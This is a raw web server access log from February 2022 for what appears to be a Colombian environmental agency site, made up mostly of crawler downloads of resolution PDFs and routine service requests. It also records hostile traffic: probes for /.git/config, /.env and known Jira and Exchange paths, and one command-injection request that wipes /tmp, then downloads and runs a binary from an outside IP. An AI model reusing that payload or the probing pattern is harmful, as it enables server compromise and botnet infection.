143.198.136.88 - - [14/Feb/2022:01:20:44 -0500] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 1018
143.198.136.88 - - [14/Feb/2022:01:20:44 -0500] "GET /server-status HTTP/1.1" 403 1165
143.198.136.88 - - [14/Feb/2022:01:20:45 -0500] "GET /.git/config HTTP/1.1" 404 1018
143.198.136.88 - - [14/Feb/2022:01:20:45 -0500] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
143.198.136.88 - - [14/Feb/2022:01:20:45 -0500] "GET /.env HTTP/1.1" 404 1018
114.119.141.69 - - [14/Feb/2022:01:21:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4203.pdf HTTP/1.1" 200 1137007
181.176.35.10 - - [14/Feb/2022:01:21:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [14/Feb/2022:01:21:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44231
201.245.192.253 - - [14/Feb/2022:01:21:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
216.245.221.92 - - [14/Feb/2022:01:22:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:01:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47537
114.119.141.52 - - [14/Feb/2022:01:23:12 -0500] "GET /BLA/resoluciones/AUTOS%202014/0873.pdf HTTP/1.1" 200 317247
114.119.141.73 - - [14/Feb/2022:01:24:57 -0500] "GET /BLA/resoluciones/AUTOS%202015/6718.pdf HTTP/1.1" 200 584545
114.119.132.76 - - [14/Feb/2022:01:26:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3460.pdf HTTP/1.1" 200 449305
216.245.221.92 - - [14/Feb/2022:01:27:20 -0500] "HEAD / HTTP/1.1" 200 -
34.207.53.84 - - [14/Feb/2022:01:28:50 -0500] "GET /galeria/galeria/fotos/3humedal-Burro3P.jpg HTTP/1.1" 200 8564
114.119.132.76 - - [14/Feb/2022:01:28:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2034.pdf HTTP/1.1" 200 1078459
114.119.141.69 - - [14/Feb/2022:01:30:46 -0500] "GET /Publicaciones/2020EE210528.pdf HTTP/1.1" 404 228
40.77.167.10 - - [14/Feb/2022:01:31:57 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3644.doc HTTP/1.1" 200 1013248
201.245.192.253 - - [14/Feb/2022:01:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44231
201.245.192.253 - - [14/Feb/2022:01:31:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
216.245.221.92 - - [14/Feb/2022:01:32:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.71 - - [14/Feb/2022:01:32:34 -0500] "GET /BLA/resoluciones/AUTOS%202014/6081.pdf HTTP/1.1" 200 423365
201.245.192.253 - - [14/Feb/2022:01:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47537
114.119.141.42 - - [14/Feb/2022:01:34:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3318.pdf HTTP/1.1" 200 503199
216.245.221.92 - - [14/Feb/2022:01:37:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.132.76 - - [14/Feb/2022:01:37:26 -0500] "GET /Publicaciones/2020EE219597.pdf HTTP/1.1" 404 228
114.119.141.69 - - [14/Feb/2022:01:39:16 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1998/ HTTP/1.1" 200 13300
157.55.39.210 - - [14/Feb/2022:01:39:17 -0500] "-" 408 -
114.119.141.69 - - [14/Feb/2022:01:41:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1676.pdf HTTP/1.1" 200 752678
201.245.192.253 - - [14/Feb/2022:01:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44231
201.245.192.253 - - [14/Feb/2022:01:41:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
216.245.221.92 - - [14/Feb/2022:01:42:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:01:41:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47537
114.119.132.76 - - [14/Feb/2022:01:43:12 -0500] "GET /transparencia/directorioservidores/2018/enero.xlsx HTTP/1.1" 200 88979
114.119.141.53 - - [14/Feb/2022:01:45:03 -0500] "GET /BLA/resoluciones/AUTOS%202014/4790.pdf HTTP/1.1" 200 573877
114.119.141.71 - - [14/Feb/2022:01:46:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5943.pdf HTTP/1.1" 200 101425
216.245.221.92 - - [14/Feb/2022:01:47:20 -0500] "HEAD / HTTP/1.1" 200 -
13.66.139.0 - - [14/Feb/2022:01:48:29 -0500] "GET /BLA/resoluciones/AUTOS%202019/3962.pdf HTTP/1.1" 200 298136
114.119.141.71 - - [14/Feb/2022:01:48:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4150.pdf HTTP/1.1" 200 755481
114.119.141.52 - - [14/Feb/2022:01:50:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0703.pdf HTTP/1.1" 200 103666
45.238.182.149 - - [14/Feb/2022:01:51:15 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.84 - - [14/Feb/2022:01:51:51 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2814.doc HTTP/1.1" 200 227840
201.245.192.253 - - [14/Feb/2022:01:51:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
114.119.141.51 - - [14/Feb/2022:01:52:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3556.pdf HTTP/1.1" 200 757152
216.245.221.92 - - [14/Feb/2022:01:52:20 -0500] "HEAD / HTTP/1.1" 200 -
20.109.241.96 - - [14/Feb/2022:01:53:36 -0500] "GET /galeria/nivo-slider/demo/images/Caminatas%20marzo.png HTTP/1.1" 200 661357
114.119.141.53 - - [14/Feb/2022:01:53:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2571.pdf HTTP/1.1" 200 53066
152.61.192.232 - - [14/Feb/2022:01:54:26 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [14/Feb/2022:01:54:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [14/Feb/2022:01:54:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
114.119.141.53 - - [14/Feb/2022:01:55:58 -0500] "GET /BLA/resoluciones/AUTOS%202015/3414.pdf HTTP/1.1" 200 557261
216.245.221.92 - - [14/Feb/2022:01:57:20 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.10 - - [14/Feb/2022:01:57:29 -0500] "GET /bla/resoluciones/resoluciones%202012/0207.pdf HTTP/1.1" 200 1032007
40.77.167.10 - - [14/Feb/2022:01:57:39 -0500] "GET /bla/resoluciones/resoluciones%202012/0752.pdf HTTP/1.1" 200 4480156
114.119.141.53 - - [14/Feb/2022:01:57:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0705.pdf HTTP/1.1" 200 103642
114.119.141.53 - - [14/Feb/2022:01:59:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5293.pdf HTTP/1.1" 200 750563
34.91.251.66 - - [14/Feb/2022:02:00:40 -0500] "GET / HTTP/1.1" 200 319
114.119.141.53 - - [14/Feb/2022:02:01:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7047.pdf HTTP/1.1" 200 47645
201.245.192.253 - - [14/Feb/2022:02:01:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 120681
216.245.221.92 - - [14/Feb/2022:02:02:20 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.31 - - [14/Feb/2022:02:02:22 -0500] "-" 408 -
207.46.13.106 - - [14/Feb/2022:02:02:51 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/2722.pdf HTTP/1.1" 200 254472
114.119.141.53 - - [14/Feb/2022:02:03:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/2567.pdf HTTP/1.1" 200 780141
114.119.141.53 - - [14/Feb/2022:02:05:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5564.pdf HTTP/1.1" 200 506010
69.63.189.21 - - [14/Feb/2022:02:06:36 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
114.119.141.53 - - [14/Feb/2022:02:07:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6172.pdf HTTP/1.1" 200 859146
216.245.221.92 - - [14/Feb/2022:02:07:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [14/Feb/2022:02:09:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1440.pdf HTTP/1.1" 200 675748
207.46.13.99 - - [14/Feb/2022:02:10:47 -0500] "GET /bla/resoluciones/resoluciones%202012/1716.pdf HTTP/1.1" 200 1261210
114.119.141.53 - - [14/Feb/2022:02:10:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1890.pdf HTTP/1.1" 200 512794
157.230.216.203 - - [14/Feb/2022:02:11:19 -0500] "GET /ab2g HTTP/1.1" 400 946
157.230.216.203 - - [14/Feb/2022:02:11:19 -0500] "GET /ab2h HTTP/1.1" 400 946
201.245.192.253 - - [14/Feb/2022:02:11:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
216.245.221.92 - - [14/Feb/2022:02:12:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [14/Feb/2022:02:12:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0361.pdf HTTP/1.1" 200 427201
114.119.141.53 - - [14/Feb/2022:02:14:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0860.pdf HTTP/1.1" 200 106438
173.252.95.5 - - [14/Feb/2022:02:16:05 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
173.252.95.9 - - [14/Feb/2022:02:16:05 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
173.252.95.16 - - [14/Feb/2022:02:16:05 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
173.252.95.3 - - [14/Feb/2022:02:16:05 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
69.63.184.1 - - [14/Feb/2022:02:16:06 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
69.63.184.117 - - [14/Feb/2022:02:16:06 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
69.63.184.117 - - [14/Feb/2022:02:16:06 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
69.63.184.2 - - [14/Feb/2022:02:16:06 -0500] "GET /ojo-a-los-arboles-en-riesgo.html HTTP/1.1" 206 791
114.119.141.53 - - [14/Feb/2022:02:16:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7865.pdf HTTP/1.1" 200 37114
216.245.221.92 - - [14/Feb/2022:02:17:20 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.53 - - [14/Feb/2022:02:18:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3485.pdf HTTP/1.1" 200 521435
114.119.141.53 - - [14/Feb/2022:02:20:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%204101%20AL%204200/RESOLUCION%204154%20DE%202007.pdf HTTP/1.1" 200 296158
31.148.131.113 - - [14/Feb/2022:02:21:15 -0500] "GET /bla/resoluciones/resoluciones%202012/1131.pdf HTTP/1.1" 200 1519411
114.119.141.53 - - [14/Feb/2022:02:21:58 -0500] "GET /Autoliquidacion/index.php?dir=Cobro%2BClasificacion%2BUso%2BDe%2BVivenda%2BEn%2BSuelo%2BRestringido/ HTTP/1.1" 200 6949
201.245.192.253 - - [14/Feb/2022:02:21:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44235
216.245.221.92 - - [14/Feb/2022:02:22:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:02:22:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47703
201.245.192.253 - - [14/Feb/2022:02:22:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
114.119.141.52 - - [14/Feb/2022:02:23:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20401%20AL%20500/RESOLUCION%200466%20DE%202007.pdf HTTP/1.1" 200 1048212
114.119.141.53 - - [14/Feb/2022:02:25:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1997.pdf HTTP/1.1" 200 304798
152.61.128.50 - - [14/Feb/2022:02:25:43 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [14/Feb/2022:02:25:45 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [14/Feb/2022:02:25:45 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
157.55.39.84 - - [14/Feb/2022:02:26:04 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3480.doc HTTP/1.1" 200 228352
183.136.225.56 - - [14/Feb/2022:02:26:26 -0500] "GET / HTTP/1.1" 200 319
114.119.141.51 - - [14/Feb/2022:02:27:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3570.pdf HTTP/1.1" 200 1726626
114.119.141.73 - - [14/Feb/2022:02:29:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/1367.pdf HTTP/1.1" 200 384736
114.119.141.52 - - [14/Feb/2022:02:31:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3711.pdf HTTP/1.1" 200 237365
201.245.192.253 - - [14/Feb/2022:02:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44235
201.245.192.253 - - [14/Feb/2022:02:31:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
201.245.192.253 - - [14/Feb/2022:02:31:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47703
114.119.141.73 - - [14/Feb/2022:02:32:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5794.pdf HTTP/1.1" 200 92222
20.36.244.102 - - [14/Feb/2022:02:32:49 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
216.245.221.92 - - [14/Feb/2022:02:36:24 -0500] "HEAD / HTTP/1.1" 200 -
118.184.177.26 - - [14/Feb/2022:02:37:31 -0500] "GET / HTTP/1.1" 200 319
114.119.132.76 - - [14/Feb/2022:02:39:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2241.pdf HTTP/1.1" 200 789702
213.186.1.246 - - [14/Feb/2022:02:41:57 -0500] "-" 408 -
201.245.192.253 - - [14/Feb/2022:02:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44235
114.119.141.51 - - [14/Feb/2022:02:42:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1242.pdf HTTP/1.1" 200 5423629
201.245.192.253 - - [14/Feb/2022:02:41:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
201.245.192.253 - - [14/Feb/2022:02:41:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47703
114.119.141.51 - - [14/Feb/2022:02:43:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7042.pdf HTTP/1.1" 200 65021
216.245.221.92 - - [14/Feb/2022:02:44:50 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.15 - - [14/Feb/2022:02:45:11 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/autos+2017 HTTP/1.1" 200 138776
114.119.141.51 - - [14/Feb/2022:02:46:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20901%20AL%201000/RESOLUCION%200917%20DE%202007.pdf HTTP/1.1" 200 160040
207.46.13.99 - - [14/Feb/2022:02:47:51 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/02206.doc HTTP/1.1" 200 400433
40.77.167.10 - - [14/Feb/2022:02:47:53 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04406.pdf HTTP/1.1" 200 261138
207.46.13.106 - - [14/Feb/2022:02:47:55 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04208.pdf HTTP/1.1" 200 324779
157.55.39.84 - - [14/Feb/2022:02:47:56 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/4997.pdf HTTP/1.1" 200 292438
207.46.13.99 - - [14/Feb/2022:02:47:58 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/02457.pdf HTTP/1.1" 304 -
207.46.13.99 - - [14/Feb/2022:02:47:59 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/05035.pdf HTTP/1.1" 200 452272
40.77.167.10 - - [14/Feb/2022:02:48:00 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/05224.pdf HTTP/1.1" 200 343556
207.46.13.99 - - [14/Feb/2022:02:48:02 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04670.pdf HTTP/1.1" 200 265971
207.46.13.106 - - [14/Feb/2022:02:48:03 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01122.pdf HTTP/1.1" 200 279011
157.55.39.84 - - [14/Feb/2022:02:48:03 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03721.pdf HTTP/1.1" 200 1313053
40.77.167.10 - - [14/Feb/2022:02:48:03 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/03322.pdf HTTP/1.1" 200 316537
157.55.39.84 - - [14/Feb/2022:02:48:06 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/03274.pdf HTTP/1.1" 200 1627105
157.55.39.84 - - [14/Feb/2022:02:48:06 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03984.pdf HTTP/1.1" 200 278357
157.55.39.84 - - [14/Feb/2022:02:48:10 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04254.pdf HTTP/1.1" 200 3585707
207.46.13.99 - - [14/Feb/2022:02:48:10 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/03254.pdf HTTP/1.1" 200 1736408
157.55.39.87 - - [14/Feb/2022:02:48:10 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01491.pdf HTTP/1.1" 200 320410
207.46.13.15 - - [14/Feb/2022:02:48:10 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/1667.pdf HTTP/1.1" 200 1328469
207.46.13.99 - - [14/Feb/2022:02:48:14 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04032.pdf HTTP/1.1" 200 271452
40.77.167.10 - - [14/Feb/2022:02:48:14 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/03079.pdf HTTP/1.1" 200 275332
207.46.13.106 - - [14/Feb/2022:02:48:16 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04480.pdf HTTP/1.1" 200 267859
157.55.39.87 - - [14/Feb/2022:02:48:18 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/05304.pdf HTTP/1.1" 200 1188569
157.55.39.87 - - [14/Feb/2022:02:48:21 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/4472.pdf HTTP/1.1" 200 293120
207.46.13.15 - - [14/Feb/2022:02:48:22 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01786.pdf HTTP/1.1" 200 279976
207.46.13.106 - - [14/Feb/2022:02:48:25 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/3394.pdf HTTP/1.1" 304 -
157.55.39.84 - - [14/Feb/2022:02:48:25 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/03618.pdf HTTP/1.1" 200 273247
207.46.13.15 - - [14/Feb/2022:02:48:29 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04311.pdf HTTP/1.1" 200 261155
157.55.39.87 - - [14/Feb/2022:02:48:31 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/05041.pdf HTTP/1.1" 200 282100
157.55.39.84 - - [14/Feb/2022:02:48:32 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/05059.pdf HTTP/1.1" 200 284767
207.46.13.15 - - [14/Feb/2022:02:48:36 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/03714.pdf HTTP/1.1" 200 308079
157.55.39.84 - - [14/Feb/2022:02:48:45 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/05031.pdf HTTP/1.1" 200 276857
114.119.132.76 - - [14/Feb/2022:02:48:48 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2017/&sort=size&order=asc HTTP/1.1" 200 13341
207.46.13.15 - - [14/Feb/2022:02:48:50 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01606.pdf HTTP/1.1" 200 323043
157.55.39.84 - - [14/Feb/2022:02:48:55 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01804.pdf HTTP/1.1" 200 283343
207.46.13.15 - - [14/Feb/2022:02:48:57 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/00831.doc HTTP/1.1" 200 379436
207.46.13.15 - - [14/Feb/2022:02:49:10 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/00914.pdf HTTP/1.1" 304 -
216.245.221.92 - - [14/Feb/2022:02:49:49 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.73 - - [14/Feb/2022:02:51:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0818.pdf HTTP/1.1" 200 643574
201.245.192.253 - - [14/Feb/2022:02:51:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
206.41.162.181 - - [14/Feb/2022:02:52:52 -0500] "GET /secretaria-de-ambiente-invita-a-comunidad-de-bosa-a-entregar-residuos-especiales-y-peligrosos.html HTTP/1.1" 200 992
114.119.141.53 - - [14/Feb/2022:02:57:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B1994/&sort=date&order=desc HTTP/1.1" 200 13299
40.77.167.10 - - [14/Feb/2022:02:58:54 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/1608.pdf HTTP/1.1" 200 335039
157.55.39.87 - - [14/Feb/2022:02:59:51 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/1360.pdf HTTP/1.1" 200 321234
173.252.127.118 - - [14/Feb/2022:03:00:20 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
207.46.13.99 - - [14/Feb/2022:03:00:42 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/3593.pdf HTTP/1.1" 200 289361
207.46.13.99 - - [14/Feb/2022:03:00:52 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/04319.pdf HTTP/1.1" 200 278860
40.77.167.10 - - [14/Feb/2022:03:00:54 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01566.pdf HTTP/1.1" 200 322599
207.46.13.15 - - [14/Feb/2022:03:01:02 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/01171.pdf HTTP/1.1" 304 -
207.46.13.15 - - [14/Feb/2022:03:01:04 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04258.pdf HTTP/1.1" 200 883941
216.245.221.92 - - [14/Feb/2022:03:01:40 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.10 - - [14/Feb/2022:03:02:15 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3401.doc HTTP/1.1" 200 253440
201.245.192.253 - - [14/Feb/2022:03:01:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121090
114.119.132.76 - - [14/Feb/2022:03:02:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0812.pdf HTTP/1.1" 200 628268
13.66.139.0 - - [14/Feb/2022:03:03:00 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/02457.pdf HTTP/1.1" 200 277857
114.119.141.71 - - [14/Feb/2022:03:04:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201001%20AL%201100/RESOLUCION%201051%20DE%202007.pdf HTTP/1.1" 200 396495
207.46.13.99 - - [14/Feb/2022:03:06:02 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04483.pdf HTTP/1.1" 200 278169
207.46.13.15 - - [14/Feb/2022:03:06:03 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/01819.pdf HTTP/1.1" 200 1331747
157.55.39.84 - - [14/Feb/2022:03:06:07 -0500] "GET /bla/resoluciones/notificaciones/autos%202017/04067.pdf HTTP/1.1" 200 327126
114.119.141.52 - - [14/Feb/2022:03:06:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4437.pdf HTTP/1.1" 200 530567
216.245.221.92 - - [14/Feb/2022:03:06:39 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.51 - - [14/Feb/2022:03:08:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202001%20AL%202100/RESOLUCION%202100%20DE%202007.pdf HTTP/1.1" 200 450880
207.46.13.106 - - [14/Feb/2022:03:08:57 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2220.doc HTTP/1.1" 200 227328
114.119.141.73 - - [14/Feb/2022:03:10:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0133.pdf HTTP/1.1" 200 384454
216.245.221.92 - - [14/Feb/2022:03:11:39 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:03:11:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121085
114.119.141.73 - - [14/Feb/2022:03:14:01 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/04157.pdf HTTP/1.1" 200 262792
191.31.170.157 - - [14/Feb/2022:03:14:15 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://23.94.7.175/.s4y/arm;sh+/tmp/arm HTTP/1.1" 404 1013
114.119.153.152 - - [14/Feb/2022:03:15:40 -0500] "-" 408 -
114.119.141.51 - - [14/Feb/2022:03:15:41 -0500] "GET /portalsiaccapacitaciones/Soportes%20Capacitaciones%202017/Huella%20de%20carbono%20PIGA.pdf HTTP/1.1" 200 9776525
114.119.137.167 - - [14/Feb/2022:03:16:18 -0500] "-" 408 -
114.119.131.185 - - [14/Feb/2022:03:16:55 -0500] "-" 408 -
216.245.221.92 - - [14/Feb/2022:03:17:45 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.106 - - [14/Feb/2022:03:18:18 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/registros%202020/&sort=name&order=desc HTTP/1.1" 200 8446
157.55.39.84 - - [14/Feb/2022:03:21:48 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/05226.pdf HTTP/1.1" 200 404042
201.245.192.253 - - [14/Feb/2022:03:21:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44227
216.245.221.92 - - [14/Feb/2022:03:22:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:03:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47698
201.245.192.253 - - [14/Feb/2022:03:22:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121085
207.46.13.99 - - [14/Feb/2022:03:23:14 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/1200.pdf HTTP/1.1" 200 322480
114.119.141.42 - - [14/Feb/2022:03:26:49 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2018/ HTTP/1.1" 200 13300
157.55.39.87 - - [14/Feb/2022:03:27:04 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/3535.doc HTTP/1.1" 200 231936
157.55.39.87 - - [14/Feb/2022:03:27:07 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/autos+2016 HTTP/1.1" 200 75598
40.77.167.10 - - [14/Feb/2022:03:27:27 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2451.doc HTTP/1.1" 200 237568
40.77.167.10 - - [14/Feb/2022:03:27:28 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2562.doc HTTP/1.1" 200 226816
216.245.221.92 - - [14/Feb/2022:03:27:45 -0500] "HEAD / HTTP/1.1" 200 -
20.109.241.81 - - [14/Feb/2022:03:29:53 -0500] "GET /galeria/galeria/fotos/mirador2P.jpg HTTP/1.1" 200 10111
